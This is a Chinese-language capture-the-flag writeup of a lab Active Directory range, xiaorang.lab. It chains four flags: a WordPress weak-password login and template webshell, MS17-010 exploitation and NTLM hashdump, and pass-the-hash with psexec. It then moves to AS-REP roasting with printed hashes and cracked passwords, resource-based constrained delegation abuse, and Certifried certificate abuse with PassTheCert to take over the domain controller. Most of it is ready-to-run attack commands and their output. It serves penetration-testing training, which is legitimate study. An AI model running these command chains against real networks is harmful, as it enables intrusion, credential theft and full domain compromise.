春秋云镜 2022 网鼎杯半决赛复盘 Writeup
flag01
fscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 39.99.159.63 is alive
[*] Icmp alive hosts len is: 1
39.99.159.63:80 open
39.99.159.63:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://39.99.159.63 code:200 len:39962 title:XIAORANG.LAB
已完成 2/2
[*] 扫描结束,耗时: 37.649430375s
|
80 wordpress
wpscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
|
$ wpscan --url http://39.99.159.63/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://39.99.159.63/ [39.99.159.63]
[+] Started: Sat Aug 19 15:07:53 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://39.99.159.63/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://39.99.159.63/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://39.99.159.63/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://39.99.159.63/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
| Found By: Rss Generator (Passive Detection)
| - http://39.99.159.63/index.php/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
| - http://39.99.159.63/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://39.99.159.63/wp-content/themes/twentytwentyone/
| Latest Version: 1.8 (up to date)
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://39.99.159.63/wp-content/themes/twentytwentyone/readme.txt
| Style URL: http://39.99.159.63/wp-content/themes/twentytwentyone/style.css?ver=1.8
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://39.99.159.63/wp-content/themes/twentytwentyone/style.css?ver=1.8, Match: 'Version: 1.8'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <===============> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Aug 19 15:07:58 2023
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 42.595 KB
[+] Data Received: 465.271 KB
[+] Memory used: 462.828 MB
[+] Elapsed time: 00:00:05
|
没啥东西
http://39.99.159.63/wp-admin/
弱口令 admin/123456
改 template 404 文件 getshell
http://39.99.159.63/wp-content/themes/twentytwentyone/404.php
flag01
flag02
内网信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.15.26 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe07:9253 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:07:92:53 txqueuelen 1000 (Ethernet)
RX packets 47543 bytes 55315984 (55.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 23109 bytes 8399886 (8.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 696 bytes 60135 (60.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 696 bytes 60135 (60.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
|
fscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
172.22.15.18:139 open
172.22.15.18:80 open
172.22.15.24:80 open
172.22.15.26:80 open
172.22.15.26:22 open
172.22.15.13:139 open
172.22.15.24:3306 open
172.22.15.13:445 open
172.22.15.35:445 open
172.22.15.18:445 open
172.22.15.24:445 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.13:135 open
172.22.15.35:135 open
172.22.15.18:135 open
172.22.15.24:135 open
172.22.15.13:88 open
[*] NetInfo:
[*]172.22.15.24
[->]XR-WIN08
[->]172.22.15.24
[*] NetBios: 172.22.15.35 XIAORANG\XR-0687
[*] NetInfo:
[*]172.22.15.18
[->]XR-CA
[->]172.22.15.18
[*] NetInfo:
[*]172.22.15.35
[->]XR-0687
[->]172.22.15.35
[*] NetBios: 172.22.15.13 [+] DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[*] 172.22.15.13 (Windows Server 2016 Standard 14393)
[*] NetInfo:
[*]172.22.15.13
[->]XR-DC01
[->]172.22.15.13
[+] 172.22.15.24 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios: 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle: http://172.22.15.26 code:200 len:39962 title:XIAORANG.LAB
[*] WebTitle: http://172.22.15.24 code:302 len:0 title:None 跳转url: http://172.22.15.24/www
[*] WebTitle: http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
[*] WebTitle: http://172.22.15.24/www/sys/index.php code:200 len:135 title:None
|
整理信息
1
2
3
4
5
|
172.22.15.13 XR-DC01
172.22.15.18 80 XR-CA ADCS
172.22.15.24 80,3306 XR-WIN08 MS17-010
172.22.15.26 本机
172.22.15.35 XR-0687
|
http://172.22.15.24/
ZDOO, OA 系统, 没啥漏洞
于是去打 ms17-010
注意 msfconsole + proxychains 要打两次, 第二次才成功 (?)
hashdump
1
2
3
|
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
|
psexec 过去拿到 flag02
1
|
proxychains psexec.py [email protected] -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
|
flag03
改 administrator 密码, rdp 过去翻 phpstudy mysql 密码
连接 mysql 然后导出 OA 用户列表 (经典 AS-REP Roasting, 或者是先枚举用户名再跑 rockyou)
当然也可以在后台导出, 同样是弱口令 admin/123456
AS-REP Roasting
1
|
proxychains getNPUsers.py xiaorang.lab/ -dc-ip 172.22.15.13 -usersfile user.txt -request -outputfile hash.txt
|
hash
1
2
|
$krb5asrep$23$huachunmei@XIAORANG.LAB:0f48e917bf781eec69b0bd3ee9e05b6b$4700fc26eadd9b60b6efb2c0cd5b59d5b084b6235b7c2e4a6936d9778ab9dd61695152c51c640b065d22516c8ce2000782fdc494cc67b492aef65f737d772db3422cf39d51431c1731769b5a44330e0939d52e6cdbdb6fe72bc543a8105a5791975ae1d6066ffa5c514294f9f651260ab49f39ec97a6ac9d3f1cce7846bdf8fb0f0248c820216f911e127fcc500c8b3d8f84de129999937617188aa91c5aea513fa7c21211caf35de3a4b0b7638aa27584b42c24242a6e5101451ec5e05652c58760af58025c6a7c7a8a2bde74756b6da2a037e181a37492b1ec55b487441d44e3c0ebc159bcb348e7611f86
$krb5asrep$23$lixiuying@XIAORANG.LAB:041514fabe6d2a6e047f3dee67e4f70a$7e56418fc68c4f26c3070c4ab9e99997708d4f3e3c26be8a9649adc152f434214722c14bca7fe5e820d837c0ebf74de06cc0f5d220fb436272957511592262a5becf89955e1c6a5473ab47895e9eec9831c0250ba06925e28c07f0887e48c6fa41f3f5fd90ba6b7bcb5da9696daad05dc12bc7a51075d568a30692d08d1c7a64c8c2d4b748cb133a7d285853b200237df63fb64c152fe7b595eee0145827ee1f730f8238a2e517efec13b468ea5a21ed15fefd68eadd2cf75004b1424567df30125e11820f766198b695656ca5d98f73d586885e00e918d38be6d33b8636356186196f7d45c73555f2e0e2d0
|
hashcat 结果
1
2
|
lixiuying:winniethepooh
huachunmei:1qaz2wsx
|
crackmapexec rdp
都能连过去, 但是先别急, 跑一下 bloodhound 收集信息
1
|
proxychains bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
|
可以看到 lixiuying 对 XR-0687 具有 GenericWrite 权限 (盲猜是因为 Creator-SID)
那么直接去走一波配置 RBCD 的流程拿到 flag03
1
2
3
4
5
6
7
|
proxychains addcomputer.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
proxychains rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'TEST$'
proxychains getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
proxychains psexec.py [email protected] -k -no-pass -dc-ip 172.22.15.13
|
flag04
根据题目描述猜测要打 AD CS
用 certipy 先枚举一遍可利用的证书模版
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
$ proxychains certipy find -u '[email protected]' -p 'winniethepooh' -dc-ip 172.22.15.13 -vulnerable -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'xiaorang-XR-CA-CA' via CSRA
[!] Got error while trying to get CA configuration for 'xiaorang-XR-CA-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'xiaorang-XR-CA-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'xiaorang-XR-CA-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : xiaorang-XR-CA-CA
DNS Name : XR-CA.xiaorang.lab
Certificate Subject : CN=xiaorang-XR-CA-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 3ECFB0112E93BE9041059FA6DBB3C35A
Certificate Validity Start : 2023-06-03 07:19:59+00:00
Certificate Validity End : 2028-06-03 07:29:58+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : XIAORANG.LAB\Administrators
Access Rights
ManageCa : XIAORANG.LAB\Administrators
XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
ManageCertificates : XIAORANG.LAB\Administrators
XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Enroll : XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templates
|
只存在 ESC8, 虽然不是不能打, 但毕竟是 NTLM Relay 稍微有点麻烦
于是又去试了试看是否存在 Certifried (CVE-2022–26923)
1
2
3
4
5
6
7
8
9
10
11
|
$ proxychains certipy account create -user 'TEST2$' -pass 'P@ssw0rd' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Creating new account:
sAMAccountName : TEST2$
unicodePwd : P@ssw0rd
userAccountControl : 4096
servicePrincipalName : HOST/TEST2
RestrictedKrbHost/TEST2
dnsHostName : XR-DC01.xiaorang.lab
[*] Successfully created account 'TEST2$' with password 'P@ssw0rd
|
添加成功了, 那么继续按流程走下去
申请证书模版
1
2
3
4
5
6
7
8
9
|
$ proxychains certipy req -u '[email protected]' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -template 'Machine'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with DNS Host Name 'XR-DC01.xiaorang.lab'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'xr-dc01.pfx'
|
在申请 TGT 的时候出现了问题
1
2
3
4
5
6
|
$ proxychains certipy auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: xr-dc01$@xiaorang.lab
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
|
报错 KDC_ERR_PADATA_TYPE_NOSUPP
参考:
https://whoamianony.top/posts/pass-the-certificate-when-pkinit-is-nosupp/
https://github.com/AlmondOffSec/PassTheCert
大致就是 AD 默认支持两种协议的证书身份验证: Kerberos PKINIT 协议和 Schannel
然后这里的报错估计是 域控制器没有安装用于智能卡身份验证的证书 ? 所以可以尝试 Schannel
即通过 Schannel 将证书传递到 LDAPS, 修改 LDAP 配置 (例如配置 RBCD / DCSync), 进而获得域控权限
whoami
1
2
3
4
|
$ proxychains python3 passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
Impacket v0.12.0.dev1+20230803.144057.e2092339 - Copyright 2023 Fortra
[*] You are logged in as: XIAORANG\XR-DC01$
|
利用上面生成的 pfx 证书配置到域控的 RBCD, 注意先得把 pfx 导出为 .key 和 .crt 两个文件
1
2
3
4
5
6
7
8
|
$ proxychains python3 passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'TEST$'
Impacket v0.12.0.dev1+20230803.144057.e2092339 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] TEST$ can now impersonate users on XR-DC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] TEST$ (S-1-5-21-3745972894-1678056601-2622918667-1147)
|
最后申请 ST, psexec 连接拿到 flag04
